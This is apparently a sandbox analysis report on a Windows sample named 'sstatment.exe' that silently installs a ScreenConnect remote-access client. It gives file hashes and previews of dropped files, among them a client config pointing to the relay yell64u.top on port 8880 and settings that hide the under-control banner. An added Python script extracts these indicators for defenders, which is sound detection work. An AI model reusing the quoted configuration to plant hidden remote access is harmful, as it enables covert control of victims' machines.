                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):601376
                                                                                  Entropy (8bit):6.185921191564225
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                  MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                  SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                  SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                  SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:true
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):842248
                                                                                  Entropy (8bit):6.268561504485627
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                  MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                  SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                  SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                  SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):81696
                                                                                  Entropy (8bit):5.862223562830496
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                  MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                  SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                  SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                  SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):3343
                                                                                  Entropy (8bit):4.771733209240506
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                                  MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                                  SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                                  SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                                  SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (449), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):939
                                                                                  Entropy (8bit):5.796466792414452
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2dL9hK6E4dl/nuuAnCiCBrxKrlI3ZXfePI9Rp3vH:chh7HHnDAnCPrxKa3lff3v
                                                                                  MD5:10ACBCF7D80CC0D8D0D67FF0987D0189
                                                                                  SHA1:00E379C7CDFAB98198FFEF891BAD17231262CF66
                                                                                  SHA-256:4A4C00DA35C8FB61FF854E9D9916E74CE0433DEC574673C41D70A9374C5C7636
                                                                                  SHA-512:6ABBA073E467B6152A6B828B8E07BBC4794656CA6F040CE0D132A717CA483A9E7756B7EDBD414AC9A4A032D31FC1570DE72855A7F35386CB1AE90BC890A1CCD9
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=yell64u.top&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
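The two ScreenConnect configuration files dropped by msiexec.exe above (the ScreenConnect.ApplicationSettings file whose preview shows the under-control banner and wallpaper settings, and the file carrying ClientLaunchParametersConstraint) are where the client's relay endpoint and the key it is told to trust live. The Python below is an added example, not part of the Joe Sandbox report and not ScreenConnect code: it rebuilds both files from the previews on this page (the ApplicationSettings sample keeps only the settings visible before the preview is cut off), splits the launch parameters, decodes the k value as a Microsoft CAPI PUBLICKEYBLOB (its RSA1 magic confirms that format), and lists the user-visible-indicator settings that are switched off. Reading h, p and k as host, port and key follows from their values; the list of indicator setting names in stealth_settings is the example's own choice.

```python
"""Pull IOCs out of the dropped ScreenConnect client configs (added example)."""
import base64
import struct
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# Rebuilt from the report's Preview of the ApplicationSettings file; only the
# settings visible before the preview is truncated are kept.
APP_SETTINGS_XML = """<?xml version="1.0"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="ShowFeedbackSurveyForm" serializeAs="String"><value>false</value></setting>
    <setting name="SupportShowUnderControlBanner" serializeAs="String"><value>false</value></setting>
    <setting name="AccessShowUnderControlBanner" serializeAs="String"><value>false</value></setting>
    <setting name="SupportHideWallpaperOnConnect" serializeAs="String"><value>false</value></setting>
    <setting name="AccessHideWallpaperOnConnect" serializeAs="String"><value>false</value></setting>
    <setting name="HideWallpaperOnConnect" serializeAs="String"><value>false</value></setting>
  </ScreenConnect.ApplicationSettings>
</configuration>
"""

# Rebuilt from the report's Preview of the launch-parameter file (value copied verbatim).
LAUNCH_XML = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="ClientLaunchParametersConstraint" serializeAs="String">
      <value>?h=yell64u.top&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA</value>
    </setting>
  </ScreenConnect.ApplicationSettings>
</configuration>
"""

CALG_RSA_KEYX = 0xA400  # CAPI algorithm id carried in the blob header


def read_settings(xml_text):
    """Return {setting name: value} for every <setting> in a client config."""
    root = ET.fromstring(xml_text)
    return {s.get("name"): s.findtext("value") for s in root.iter("setting")}


def parse_launch_params(constraint):
    """Split '?h=...&p=...&k=...' into a dict; parse_qs percent-decodes %2f/%2b in k."""
    pairs = parse_qs(constraint.lstrip("?"), strict_parsing=True)
    return {name: values[0] for name, values in pairs.items()}


def parse_capi_rsa_pubkey(b64):
    """Decode a CAPI PUBLICKEYBLOB: PUBLICKEYSTRUC, RSAPUBKEY, little-endian modulus."""
    blob = base64.b64decode(b64, validate=True)
    btype, _version, _reserved, alg_id = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<4sII", blob, 8)
    if btype != 0x06 or magic != b"RSA1":          # 0x06 = PUBLICKEYBLOB
        raise ValueError("not an RSA PUBLICKEYBLOB")
    modulus = blob[20:20 + bitlen // 8]
    if len(modulus) != bitlen // 8:
        raise ValueError("blob shorter than its declared bit length")
    return {"alg_id": alg_id, "bitlen": bitlen, "exponent": pubexp,
            "modulus": int.from_bytes(modulus, "little")}


def stealth_settings(settings):
    """Names of settings that hide a user-visible sign of remote control (example's own list)."""
    indicators = ("ShowUnderControlBanner", "ShowBalloonOnConnect")
    return sorted(name for name, value in settings.items()
                  if any(i in name for i in indicators) and value.lower() == "false")


def extract_iocs(launch_xml=LAUNCH_XML, settings_xml=APP_SETTINGS_XML):
    """Relay endpoint, trusted-key parameters and disabled indicators from the two configs."""
    params = parse_launch_params(read_settings(launch_xml)["ClientLaunchParametersConstraint"])
    key = parse_capi_rsa_pubkey(params["k"])
    return {
        "relay_host": params["h"],
        "relay_port": int(params["p"]),
        "key_alg_id": key["alg_id"],
        "key_bits": key["bitlen"],
        "key_exponent": key["exponent"],
        "key_modulus_bits": key["modulus"].bit_length(),
        "indicators_disabled": stealth_settings(read_settings(settings_xml)),
    }


if __name__ == "__main__":
    for name, value in extract_iocs().items():
        print(f"{name}: {value}")
```

The host and port (yell64u.top, 8880, matching the non-standard-port traffic flagged in the signatures) are the network indicators to block and hunt for; the decoded key is a 2048-bit RSA public key with exponent 65537 and only identifies which relay the client will accept, so it is useful for clustering samples that point at the same operator infrastructure rather than as something to block. Treat the banner settings as context, not proof: the report shows their values but says nothing about the product defaults.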
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):746
                                                                                  Entropy (8bit):5.349174276064173
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                                  MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                  SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                  SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                  SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                  Process:C:\Users\user\Desktop\sstatment.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):321
                                                                                  Entropy (8bit):5.36509199858051
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                  MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                  SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                  SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                  SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                  Malicious:true
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                  Category:dropped
                                                                                  Size (bytes):1086792
                                                                                  Entropy (8bit):7.793516535218678
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                                                  MD5:30CA21632F98D354A940903214AE4DE1
                                                                                  SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                                                  SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                                                  SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):234
                                                                                  Entropy (8bit):4.977464602412109
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                  MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                  SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                  SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                  SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                  Malicious:false
                                                                                  Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):49152
                                                                                  Entropy (8bit):4.62694170304723
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                  MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                  SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                  SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                  SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):36864
                                                                                  Entropy (8bit):4.340550904466943
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                  MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                  SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                  SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                  SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):57344
                                                                                  Entropy (8bit):4.657268358041957
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                  MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                  SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                  SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                  SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):176128
                                                                                  Entropy (8bit):5.775360792482692
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                  MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                  SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                  SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                  SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):548864
                                                                                  Entropy (8bit):6.031251664661689
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11776
                                                                                  Entropy (8bit):5.267782165666963
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                                                  MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                                                  SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                                                  SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                                                  SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1721856
                                                                                  Entropy (8bit):6.639136400085158
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\Desktop\sstatment.exe
